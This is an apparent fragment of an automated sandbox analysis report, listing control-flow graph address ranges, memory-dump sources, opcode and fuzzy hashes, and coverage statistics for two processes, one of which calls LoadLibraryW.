7ffbad39dfc1-7ffbad39dfce 1130->1135 1131->1130 1147 7ffbad39e041-7ffbad39e04b 1134->1147 1142 7ffbad39dfd0-7ffbad39dfde 1135->1142 1143 7ffbad39dfe2-7ffbad39e007 1135->1143 1139 7ffbad39e0e8-7ffbad39e18c call 7ffbad393250 1136->1139 1140 7ffbad39e0bb-7ffbad39e0c2 1136->1140 1137->1117 1164 7ffbad39e18e-7ffbad39e1af 1139->1164 1165 7ffbad39e1ed-7ffbad39e1f5 1139->1165 1140->1115 1149 7ffbad39e00c-7ffbad39e01c 1142->1149 1150 7ffbad39dfe0 1142->1150 1143->1149 1152 7ffbad39e052-7ffbad39e07f 1147->1152 1149->1152 1150->1143 1150->1147 1152->1129
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1b890220073193897af1ce98e40498af03c4ab6d8278d18a7f22a9939fc3fa3f
                                                                                                                                          • Instruction ID: e46f37ad453e84438568145eb23b9c3e8044c904e6b0eff9405402df17c1cbb7
                                                                                                                                          • Opcode Fuzzy Hash: 1b890220073193897af1ce98e40498af03c4ab6d8278d18a7f22a9939fc3fa3f
                                                                                                                                          • Instruction Fuzzy Hash: 2F121961A1EE1A4FE759EB3CE4667BD77D1EF98710F14007AE84EC32D2ED18A8028351
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1166 7ffbad3941c0-7ffbad3941d5 1167 7ffbad394213-7ffbad394227 1166->1167 1168 7ffbad3941d7-7ffbad3941f6 1166->1168 1169 7ffbad394228-7ffbad394287 call 7ffbad3941c0 1168->1169 1170 7ffbad3941f8-7ffbad394212 1168->1170 1175 7ffbad394289-7ffbad39428f 1169->1175 1176 7ffbad394291-7ffbad3942a1 1169->1176 1177 7ffbad3942a3-7ffbad3942a7 1175->1177 1176->1177 1178 7ffbad3942a9 1177->1178 1179 7ffbad39431b-7ffbad394326 1177->1179 1180 7ffbad3945a5-7ffbad3945b4 1178->1180 1179->1180 1181 7ffbad39432c 1179->1181 1184 7ffbad394595-7ffbad39459e 1180->1184 1185 7ffbad3945b6-7ffbad3945d9 call 7ffbad393288 call 7ffbad390458 1180->1185 1182 7ffbad3942ae-7ffbad3942d5 call 7ffbad393c60 1181->1182 1190 7ffbad3942d7-7ffbad3942e1 1182->1190 1191 7ffbad39432e-7ffbad394336 1182->1191 1184->1180 1213 7ffbad3945e0-7ffbad394629 call 7ffbad3932c8 call 7ffbad390458 1185->1213 1194 7ffbad3942e7-7ffbad3942fc 1190->1194 1195 7ffbad39453e-7ffbad394552 1190->1195 1196 7ffbad394338 1191->1196 1197 7ffbad39433b-7ffbad394345 1191->1197 1201 7ffbad394559-7ffbad394564 1194->1201 1202 7ffbad394302 1194->1202 1195->1201 1196->1197 1198 7ffbad394347-7ffbad394350 1197->1198 1199 7ffbad394352-7ffbad394356 1197->1199 1203 7ffbad39435b-7ffbad39435e 1198->1203 1199->1203 1204 7ffbad394307-7ffbad39431a 1201->1204 1205 7ffbad39456a-7ffbad394593 call 7ffbad3932d0 call 7ffbad390458 1201->1205 1202->1205 1206 7ffbad394364-7ffbad394371 1203->1206 1207 7ffbad394415-7ffbad39441b 1203->1207 1205->1184 1210 7ffbad394426-7ffbad394439 1206->1210 1211 7ffbad394377-7ffbad394382 1206->1211 1207->1213 1214 7ffbad394421 1207->1214 1215 7ffbad394384-7ffbad39438b 1210->1215 1211->1215 1249 7ffbad39462a-7ffbad394634 1213->1249 1214->1206 1218 7ffbad39443e-7ffbad394441 1215->1218 1219 7ffbad394391-7ffbad394394 call 7ffbad3934a0 1215->1219 1224 7ffbad394444-7ffbad394449 1218->1224 1226 7ffbad394399-7ffbad3943b5 call 7ffbad393c60 1219->1226 1227 7ffbad39444b 1224->1227 1228 7ffbad3943d0-7ffbad3943d3 1224->1228 1239 7ffbad3943bb-7ffbad3943bf 1226->1239 1240 7ffbad394450-7ffbad394462 1226->1240 1227->1219 1232 7ffbad3943d9-7ffbad3943e5 1228->1232 1233 7ffbad394481-7ffbad3944d8 call 7ffbad393498 call 7ffbad393ab0 1228->1233 1232->1224 1237 7ffbad3943e7-7ffbad3943fb 1232->1237 1259 7ffbad3944e5-7ffbad3944e9 1233->1259 1260 7ffbad3944da-7ffbad3944e3 1233->1260 1237->1233 1250 7ffbad394401-7ffbad394410 call 7ffbad393c60 1237->1250 1243 7ffbad3943c1-7ffbad3943c5 1239->1243 1240->1243 1247 7ffbad394467-7ffbad394472 1243->1247 1248 7ffbad3943cb 1243->1248 1252 7ffbad39463b-7ffbad39464a 1247->1252 1253 7ffbad394478-7ffbad39447b 1247->1253 1248->1252 1249->1252 1250->1190 1252->1249 1258 7ffbad39464c-7ffbad39468f call 7ffbad3932d0 call 7ffbad390458 1252->1258 1253->1232 1253->1233 1271 7ffbad394696-7ffbad394701 call 7ffbad3932d0 call 7ffbad390458 1258->1271 1262 7ffbad3944ee-7ffbad3944f1 1259->1262 1260->1262 1264 7ffbad3944f3-7ffbad3944f9 1262->1264 1265 7ffbad3944ff-7ffbad394509 1262->1265 1264->1190 1264->1265 1267 7ffbad394516-7ffbad39451a 1265->1267 1268 7ffbad39450b-7ffbad394514 1265->1268 1270 7ffbad39451f-7ffbad394522 1267->1270 1268->1270 1270->1271 1272 7ffbad394528-7ffbad394533 1270->1272 1284 7ffbad394703-7ffbad39470a 1271->1284 1285 7ffbad39470b-7ffbad394733 1271->1285 1272->1271 1273 7ffbad394539 1272->1273 1273->1182 1284->1285 1287 7ffbad39473a-7ffbad394743 1285->1287 1288 7ffbad394735 call 7ffbad393c60 1285->1288 1289 7ffbad394745-7ffbad39474c 1287->1289 1290 7ffbad39474d-7ffbad394755 1287->1290 1288->1287 1291 7ffbad394757 1290->1291 1292 7ffbad39475a-7ffbad39477a call 7ffbad3934f0 1290->1292 1291->1292 1295 7ffbad39478b-7ffbad394799 call 7ffbad3934b0 1292->1295 1296 7ffbad39477c-7ffbad39477f call 7ffbad3934b8 1292->1296 1299 7ffbad394784-7ffbad39478a 1296->1299
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f38c88ec243cbae714a538074f1636d4acfe6d3992ab62537bbb5c624c30e3a4
                                                                                                                                          • Instruction ID: 189934215ba2087937f7daa7ac58c3f6984d2afc82e83cd424fe0062bb5b2e10
                                                                                                                                          • Opcode Fuzzy Hash: f38c88ec243cbae714a538074f1636d4acfe6d3992ab62537bbb5c624c30e3a4
                                                                                                                                          • Instruction Fuzzy Hash: D60229A1E0DA5A5FE75A9638C46537DB7C1EF49324F14017DE88EC32D2EE2CA8438785
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1301 7ffbad3aa1a9-7ffbad3aa1dc 1303 7ffbad3aa226-7ffbad3aa257 1301->1303 1304 7ffbad3aa1de-7ffbad3aa20a 1301->1304 1310 7ffbad3aa259 1303->1310 1311 7ffbad3aa25e-7ffbad3aa273 1303->1311 1305 7ffbad3aa20c 1304->1305 1306 7ffbad3aa211-7ffbad3aa221 1304->1306 1305->1306 1306->1303 1310->1311 1312 7ffbad3aa275 1311->1312 1313 7ffbad3aa27a-7ffbad3aa28f 1311->1313 1312->1313 1314 7ffbad3aa296-7ffbad3aa2ab 1313->1314 1315 7ffbad3aa291 1313->1315 1316 7ffbad3aa2ad 1314->1316 1317 7ffbad3aa2b2-7ffbad3aa2c7 1314->1317 1315->1314 1316->1317 1318 7ffbad3aa2c9 1317->1318 1319 7ffbad3aa2ce-7ffbad3aa2e3 1317->1319 1318->1319 1320 7ffbad3aa2e5 1319->1320 1321 7ffbad3aa2ea-7ffbad3aa2ff 1319->1321 1320->1321 1322 7ffbad3aa306-7ffbad3aa31b 1321->1322 1323 7ffbad3aa301 1321->1323 1324 7ffbad3aa31d 1322->1324 1325 7ffbad3aa322-7ffbad3aa337 1322->1325 1323->1322 1324->1325 1326 7ffbad3aa339 1325->1326 1327 7ffbad3aa33e-7ffbad3aa353 1325->1327 1326->1327 1328 7ffbad3aa355 1327->1328 1329 7ffbad3aa35a-7ffbad3aa392 1327->1329 1328->1329 1332 7ffbad3aa708-7ffbad3aa710 1329->1332 1333 7ffbad3aa398-7ffbad3aa3dc 1329->1333 1334 7ffbad3aa711-7ffbad3aa712 1332->1334 1337 7ffbad3aa3e3-7ffbad3aa3ea 1333->1337 1338 7ffbad3aa3de 1333->1338 1339 7ffbad3aa3ec 1337->1339 1340 7ffbad3aa3f1-7ffbad3aa459 1337->1340 1338->1337 1339->1340 1345 7ffbad3aa45b 1340->1345 1346 7ffbad3aa460-7ffbad3aa533 1340->1346 1345->1346 1354 7ffbad3aa585-7ffbad3aa597 1346->1354 1355 7ffbad3aa535-7ffbad3aa541 1346->1355 1357 7ffbad3aa599 1354->1357 1358 7ffbad3aa59e 1354->1358 1359 7ffbad3aa543-7ffbad3aa55d 1355->1359 1360 7ffbad3aa59f-7ffbad3aa5b3 1355->1360 1357->1358 1358->1360 1364 7ffbad3aa5be-7ffbad3aa5c1 1359->1364 1365 7ffbad3aa55f-7ffbad3aa57a 1359->1365 1362 7ffbad3aa605-7ffbad3aa61b 1360->1362 1363 7ffbad3aa5b5-7ffbad3aa5bc 1360->1363 1366 7ffbad3aa61f-7ffbad3aa636 call 7ffbad3a5e28 1362->1366 1363->1364 1364->1366 1368 7ffbad3aa5c3-7ffbad3aa5dd 1364->1368 1365->1354 1374 7ffbad3aa638 1366->1374 1375 7ffbad3aa63d 1366->1375 1372 7ffbad3aa63e-7ffbad3aa690 call 7ffbad3a5e28 1368->1372 1373 7ffbad3aa5df-7ffbad3aa5fa 1368->1373 1380 7ffbad3aa701-7ffbad3aa702 call 7ffbad3a5e68 1372->1380 1381 7ffbad3aa692-7ffbad3aa695 1372->1381 1373->1362 1374->1375 1375->1372 1384 7ffbad3aa703 1380->1384 1381->1334 1383 7ffbad3aa697 1381->1383 1385 7ffbad3aa699-7ffbad3aa6b2 1383->1385 1386 7ffbad3aa6de 1383->1386 1387 7ffbad3aa704 1384->1387 1388 7ffbad3aa6b4-7ffbad3aa6b6 1385->1388 1386->1388 1389 7ffbad3aa6e0-7ffbad3aa6e1 1386->1389 1395 7ffbad3aa707 1387->1395 1391 7ffbad3aa6b7 1388->1391 1392 7ffbad3aa732-7ffbad3aa734 1388->1392 1393 7ffbad3aa6f3-7ffbad3aa700 1389->1393 1394 7ffbad3aa6e3-7ffbad3aa6f0 1389->1394 1396 7ffbad3aa728-7ffbad3aa72f 1391->1396 1397 7ffbad3aa6b8-7ffbad3aa6bb 1391->1397 1398 7ffbad3aa737-7ffbad3aa761 1392->1398 1393->1380 1394->1393 1395->1332 1396->1392 1397->1398 1399 7ffbad3aa6bd 1397->1399 1401 7ffbad3aa763 1398->1401 1402 7ffbad3aa768-7ffbad3aa786 1398->1402 1399->1387 1405 7ffbad3aa6bf-7ffbad3aa6c7 1399->1405 1401->1402 1403 7ffbad3aa797-7ffbad3aa7a7 1402->1403 1404 7ffbad3aa788-7ffbad3aa792 1402->1404 1407 7ffbad3aa7a9 1403->1407 1408 7ffbad3aa7ae-7ffbad3aa7bd 1403->1408 1406 7ffbad3aa822-7ffbad3aa82d 1404->1406 1410 7ffbad3aa6cd-7ffbad3aa6dd 1405->1410 1407->1408 1409 7ffbad3aa809-7ffbad3aa815 1408->1409 1411 7ffbad3aa817-7ffbad3aa820 1409->1411 1412 7ffbad3aa7bf-7ffbad3aa7c5 1409->1412 1410->1386 1411->1406 1413 7ffbad3aa7c7 1412->1413 1414 7ffbad3aa7cc-7ffbad3aa7d8 1412->1414 1413->1414 1415 7ffbad3aa7da 1414->1415 1416 7ffbad3aa7df-7ffbad3aa7ff 1414->1416 1415->1416 1417 7ffbad3aa806 1416->1417 1418 7ffbad3aa801 1416->1418 1417->1409 1418->1417
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0de1e29877df3d31ca27bb76131109c18a16ead311547a30adc4a57a40f7f832
                                                                                                                                          • Instruction ID: f896d548747ef1d13b2133b3416170d40ad9fbc7590f373173ad6a1d8b8c9004
                                                                                                                                          • Opcode Fuzzy Hash: 0de1e29877df3d31ca27bb76131109c18a16ead311547a30adc4a57a40f7f832
                                                                                                                                          • Instruction Fuzzy Hash: 1912A371A09A5E8FEB95EF68C8447E9B7E1FF58300F1041B9D40DD72A2DE39A981CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1419 7ffbad3a2cf6-7ffbad3a2d03 1420 7ffbad3a2d05-7ffbad3a2d0d 1419->1420 1421 7ffbad3a2d0e-7ffbad3a2dd7 1419->1421 1420->1421 1425 7ffbad3a2e43 1421->1425 1426 7ffbad3a2dd9-7ffbad3a2de2 1421->1426 1427 7ffbad3a2e45-7ffbad3a2e6a 1425->1427 1426->1425 1428 7ffbad3a2de4-7ffbad3a2df0 1426->1428 1434 7ffbad3a2ed6 1427->1434 1435 7ffbad3a2e6c-7ffbad3a2e75 1427->1435 1429 7ffbad3a2e29-7ffbad3a2e41 1428->1429 1430 7ffbad3a2df2-7ffbad3a2e04 1428->1430 1429->1427 1432 7ffbad3a2e06 1430->1432 1433 7ffbad3a2e08-7ffbad3a2e1b 1430->1433 1432->1433 1433->1433 1436 7ffbad3a2e1d-7ffbad3a2e25 1433->1436 1438 7ffbad3a2ed8-7ffbad3a2f80 1434->1438 1435->1434 1437 7ffbad3a2e77-7ffbad3a2e83 1435->1437 1436->1429 1439 7ffbad3a2e85-7ffbad3a2e97 1437->1439 1440 7ffbad3a2ebc-7ffbad3a2ed4 1437->1440 1449 7ffbad3a2fee 1438->1449 1450 7ffbad3a2f82-7ffbad3a2f8c 1438->1450 1441 7ffbad3a2e99 1439->1441 1442 7ffbad3a2e9b-7ffbad3a2eae 1439->1442 1440->1438 1441->1442 1442->1442 1445 7ffbad3a2eb0-7ffbad3a2eb8 1442->1445 1445->1440 1452 7ffbad3a2ff0-7ffbad3a3019 1449->1452 1450->1449 1451 7ffbad3a2f8e-7ffbad3a2f9b 1450->1451 1453 7ffbad3a2fd4-7ffbad3a2fec 1451->1453 1454 7ffbad3a2f9d-7ffbad3a2faf 1451->1454 1458 7ffbad3a3083 1452->1458 1459 7ffbad3a301b-7ffbad3a3026 1452->1459 1453->1452 1456 7ffbad3a2fb3-7ffbad3a2fc6 1454->1456 1457 7ffbad3a2fb1 1454->1457 1456->1456 1460 7ffbad3a2fc8-7ffbad3a2fd0 1456->1460 1457->1456 1462 7ffbad3a3085-7ffbad3a3116 1458->1462 1459->1458 1461 7ffbad3a3028-7ffbad3a3036 1459->1461 1460->1453 1463 7ffbad3a3038-7ffbad3a304a 1461->1463 1464 7ffbad3a306f-7ffbad3a3081 1461->1464 1470 7ffbad3a311c-7ffbad3a312b 1462->1470 1465 7ffbad3a304c 1463->1465 1466 7ffbad3a304e-7ffbad3a3061 1463->1466 1464->1462 1465->1466 1466->1466 1468 7ffbad3a3063-7ffbad3a306b 1466->1468 1468->1464 1471 7ffbad3a3133-7ffbad3a3198 call 7ffbad3a31b4 1470->1471 1472 7ffbad3a312d 1470->1472 1479 7ffbad3a319a 1471->1479 1480 7ffbad3a319f-7ffbad3a31b3 1471->1480 1472->1471 1479->1480
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 01147c1bdd63add26b0b81a619ff00e05c43e2baad3420d068b705d94df454ce
                                                                                                                                          • Instruction ID: 4f83b2d7c5604f97f24a7efc54145e9636b208a8d3110b8a663c7d5f8b540d5e
                                                                                                                                          • Opcode Fuzzy Hash: 01147c1bdd63add26b0b81a619ff00e05c43e2baad3420d068b705d94df454ce
                                                                                                                                          • Instruction Fuzzy Hash: 00F1D670609E4D8FEBA9DF28D845BE977D1FF58300F04826EE84DC72A1DB7599418B82
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1481 7ffbad3a3aa2-7ffbad3a3aaf 1482 7ffbad3a3aba-7ffbad3a3b87 1481->1482 1483 7ffbad3a3ab1-7ffbad3a3ab9 1481->1483 1487 7ffbad3a3bf3 1482->1487 1488 7ffbad3a3b89-7ffbad3a3b92 1482->1488 1483->1482 1490 7ffbad3a3bf5-7ffbad3a3c1a 1487->1490 1488->1487 1489 7ffbad3a3b94-7ffbad3a3ba0 1488->1489 1491 7ffbad3a3bd9-7ffbad3a3bf1 1489->1491 1492 7ffbad3a3ba2-7ffbad3a3bb4 1489->1492 1497 7ffbad3a3c86 1490->1497 1498 7ffbad3a3c1c-7ffbad3a3c25 1490->1498 1491->1490 1493 7ffbad3a3bb6 1492->1493 1494 7ffbad3a3bb8-7ffbad3a3bcb 1492->1494 1493->1494 1494->1494 1496 7ffbad3a3bcd-7ffbad3a3bd5 1494->1496 1496->1491 1499 7ffbad3a3c88-7ffbad3a3cad 1497->1499 1498->1497 1500 7ffbad3a3c27-7ffbad3a3c33 1498->1500 1507 7ffbad3a3d1b 1499->1507 1508 7ffbad3a3caf-7ffbad3a3cb9 1499->1508 1501 7ffbad3a3c35-7ffbad3a3c47 1500->1501 1502 7ffbad3a3c6c-7ffbad3a3c84 1500->1502 1503 7ffbad3a3c49 1501->1503 1504 7ffbad3a3c4b-7ffbad3a3c5e 1501->1504 1502->1499 1503->1504 1504->1504 1506 7ffbad3a3c60-7ffbad3a3c68 1504->1506 1506->1502 1509 7ffbad3a3d1d-7ffbad3a3d4b 1507->1509 1508->1507 1510 7ffbad3a3cbb-7ffbad3a3cc8 1508->1510 1516 7ffbad3a3dbb 1509->1516 1517 7ffbad3a3d4d-7ffbad3a3d58 1509->1517 1511 7ffbad3a3cca-7ffbad3a3cdc 1510->1511 1512 7ffbad3a3d01-7ffbad3a3d19 1510->1512 1514 7ffbad3a3cde 1511->1514 1515 7ffbad3a3ce0-7ffbad3a3cf3 1511->1515 1512->1509 1514->1515 1515->1515 1518 7ffbad3a3cf5-7ffbad3a3cfd 1515->1518 1520 7ffbad3a3dbd-7ffbad3a3e95 1516->1520 1517->1516 1519 7ffbad3a3d5a-7ffbad3a3d68 1517->1519 1518->1512 1521 7ffbad3a3d6a-7ffbad3a3d7c 1519->1521 1522 7ffbad3a3da1-7ffbad3a3db9 1519->1522 1530 7ffbad3a3e9b-7ffbad3a3eaa 1520->1530 1523 7ffbad3a3d7e 1521->1523 1524 7ffbad3a3d80-7ffbad3a3d93 1521->1524 1522->1520 1523->1524 1524->1524 1526 7ffbad3a3d95-7ffbad3a3d9d 1524->1526 1526->1522 1531 7ffbad3a3eac 1530->1531 1532 7ffbad3a3eb2-7ffbad3a3f14 call 7ffbad3a3f30 1530->1532 1531->1532 1539 7ffbad3a3f16 1532->1539 1540 7ffbad3a3f1b-7ffbad3a3f2f 1532->1540 1539->1540
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5492b39472fa6a29e9f4a0958f43c1cd47578820fd6be58283837d25f8cfb6d0
                                                                                                                                          • Instruction ID: 6fb4931731b46a89674b451257aca06082f58a35d05a8d1cbf23065a1f2ff89e
                                                                                                                                          • Opcode Fuzzy Hash: 5492b39472fa6a29e9f4a0958f43c1cd47578820fd6be58283837d25f8cfb6d0
                                                                                                                                          • Instruction Fuzzy Hash: ADE1E470A09A4D8FEBA9DF28C8557E977D1FF58310F00426ED84DC72A1DF75A9418B82
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 838 7ffbad398c44-7ffbad398c4b 839 7ffbad398c56-7ffbad398cbf 838->839 840 7ffbad398c4d-7ffbad398c55 838->840 843 7ffbad398cc9-7ffbad398cfb LoadLibraryW 839->843 844 7ffbad398cc1-7ffbad398cc6 839->844 840->839 845 7ffbad398d03-7ffbad398d2a 843->845 846 7ffbad398cfd 843->846 844->843 846->845
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: 7d03cf5b67a024ade708b7cd1c76e87bbcc99423d3c080e717ded338b6abec0b
                                                                                                                                          • Instruction ID: 89267c4f889c06fd38b5601eaa7b8994219cec8c354b40f7bc0cd19f56176377
                                                                                                                                          • Opcode Fuzzy Hash: 7d03cf5b67a024ade708b7cd1c76e87bbcc99423d3c080e717ded338b6abec0b
                                                                                                                                          • Instruction Fuzzy Hash: E631E47190DA4D8FDB59DF6CD849BE9BBE0EFA5320F04422BD009D3252DB74A806CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.555600819.00007FFBAD26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD26D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad26d000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ef84d8fe6bf0a8cd0ed03219ea7bcf06735f1dacb6f0cf61ee66cf71e3383018
                                                                                                                                          • Instruction ID: 46e59702489a479975610c5b65bf00c8f58587df7951431b542272150d14984c
                                                                                                                                          • Opcode Fuzzy Hash: ef84d8fe6bf0a8cd0ed03219ea7bcf06735f1dacb6f0cf61ee66cf71e3383018
                                                                                                                                          • Instruction Fuzzy Hash: D441CF7140EBC44FDB5ADB38D8459523FF0EF5A220B1506DFE088CB1A7D625A85AC7A2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ddbb80692c5aa03b7ee308d4aba2049ac5552807e897391b0b2c7705fa776870
                                                                                                                                          • Instruction ID: 9f02716c1139f96d0daa7a05860f887889226a44d629e769435c68bb8702c572
                                                                                                                                          • Opcode Fuzzy Hash: ddbb80692c5aa03b7ee308d4aba2049ac5552807e897391b0b2c7705fa776870
                                                                                                                                          • Instruction Fuzzy Hash: 3041A36760A5BA85D602B63CBC852F9B750DF8633170003B7D3C8C90539E15AAFBCAE4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:14.1%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:3
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 12216 7ffbad399038 12217 7ffbad399041 LoadLibraryW 12216->12217 12219 7ffbad39912d 12217->12219

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 505 7ffbad399038-7ffbad3990ef 514 7ffbad3990f9-7ffbad39912b LoadLibraryW 505->514 515 7ffbad3990f1-7ffbad3990f6 505->515 516 7ffbad399133-7ffbad39915a 514->516 517 7ffbad39912d 514->517 515->514 517->516
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.383866542.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffbad390000_Zip.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: bdf5dbde93e6d5fcb19aa1473eef8cf32cd9d4dd6e73c0570ceb850b97a40194
                                                                                                                                          • Instruction ID: 0ab33b2dcff1287e981c5e2dfef1efad06f0a1e9864454f7c3299c9ed3dee571
                                                                                                                                          • Opcode Fuzzy Hash: bdf5dbde93e6d5fcb19aa1473eef8cf32cd9d4dd6e73c0570ceb850b97a40194
                                                                                                                                          • Instruction Fuzzy Hash: 434119B190DE8C4FDB99CB6CD8197ADBFE0FF99311F04426ED04AC7246EA3098458792
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 533 7ffbad3986aa-7ffbad3990ef 536 7ffbad3990f9-7ffbad39912b LoadLibraryW 533->536 537 7ffbad3990f1-7ffbad3990f6 533->537 538 7ffbad399133-7ffbad39915a 536->538 539 7ffbad39912d 536->539 537->536 539->538
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.383866542.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffbad390000_Zip.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: e0f01369e8f75bcce9581f1b2cd011fb0e7dc5e923463f000760b90f420c1ae8
                                                                                                                                          • Instruction ID: d01b43f7b331b7343cfb41741c75887c019a12f2e2fa428fc1c6556070100de4
                                                                                                                                          • Opcode Fuzzy Hash: e0f01369e8f75bcce9581f1b2cd011fb0e7dc5e923463f000760b90f420c1ae8
                                                                                                                                          • Instruction Fuzzy Hash: A2218071908A1D9FDB58DB58D449BEDBBF0FB69311F00822ED00AD3651DB70A856CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000A.00000002.382955394.00007FFBAD26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD26D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffbad26d000_Zip.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ddcaaf691e74849f3a4e545aae5a4de588ef8d6a051b88ac53e1b90eed3301a7
